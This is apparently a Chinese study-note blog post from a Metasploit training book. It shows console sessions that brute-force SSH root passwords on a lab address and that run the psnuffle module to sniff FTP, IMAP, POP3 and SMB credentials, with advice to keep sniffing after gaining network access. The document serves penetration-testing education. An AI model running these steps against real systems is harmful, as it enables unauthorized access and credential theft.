zoukankan      html  css  js  c++  java
  • MSF魔鬼训练营-3.3.2 口令猜测与嗅探

    密码暴力破解以SSH为例,其他协议方法类似
    SSH
         msf > use auxiliary/scanner/ssh/ssh_login
    msf auxiliary(ssh_login) > set rhosts 192.168.3.199
    rhosts => 192.168.3.199
    msf auxiliary(ssh_login) > set username root
    username => root
    msf auxiliary(ssh_login) > set pass_file /root/pass.txt
    pass_file => /root/pass.txt
    msf auxiliary(ssh_login) > set threads 100
    threads => 100
    msf auxiliary(ssh_login) > run
     
    [*] SSH - Starting bruteforce
    [-] SSH - Failed: 'root:19500101an'
    [-] SSH - Failed: 'root:19500101ba'
    [-] SSH - Failed: 'root:19500101bai'
    [-] SSH - Failed: 'root:19500101ban'
    [-] SSH - Failed: 'root:19500101bao'
    [-] SSH - Failed: 'root:19500101bei'
    [-] SSH - Failed: 'root:19500101bi'
    [-] SSH - Failed: 'root:19500101bian'
     

    在计入对方网络的初始访问点后才能够方便的使用psnuffle模块进行口令嗅探。条件允许的话再介入网络的整个过程都要保持嗅探器的运行。增加截获口令的可能性。
    msf > use auxiliary/sniffer/psnuffle
    msf auxiliary(psnuffle) > show options
     
    Module options (auxiliary/sniffer/psnuffle):
     
       Name       Current Setting  Required  Description
       ----       ---------------  --------  -----------
       FILTER                      no        The filter string for capturing traffic
       INTERFACE                   no        The name of the interface
       PCAPFILE                    no        The name of the PCAP capture file to process
       PROTOCOLS  all              yes       A comma-delimited list of protocols to sniff or "all".
       SNAPLEN    65535            yes       The number of bytes to capture
       TIMEOUT    500              yes       The number of seconds to wait for new data
     
     
    Auxiliary action:
     
       Name     Description
       ----     -----------
       Sniffer 
     
     
    msf auxiliary(psnuffle) > run
    [*] Auxiliary module execution completed
    msf auxiliary(psnuffle) >
    [*] Loaded protocol FTP from /usr/share/metasploit-framework/data/exploits/psnuffle/ftp.rb...
    [*] Loaded protocol IMAP from /usr/share/metasploit-framework/data/exploits/psnuffle/imap.rb...
    [*] Loaded protocol POP3 from /usr/share/metasploit-framework/data/exploits/psnuffle/pop3.rb...
    [*] Loaded protocol SMB from /usr/share/metasploit-framework/data/exploits/psnuffle/smb.rb...
    [*] Loaded protocol URL from /usr/share/metasploit-framework/data/exploits/psnuffle/url.rb...
    [*] Sniffing traffic.....
     
     
  • 相关阅读:
    extjs2.0
    抽象类和接口的选择
    获得汉字字符串的首字母
    快速找回桌面快捷方式
    vs2008破解90天限制
    SQL Server索引的使用和优化
    SQL Server 索引结构及其使用
    桥接模式(Bridge)体验
    vs2008 Working with jQuery
    利用索引来提高速度
  • 原文地址:https://www.cnblogs.com/enderzhou/p/7554283.html
Copyright © 2011-2022 走看看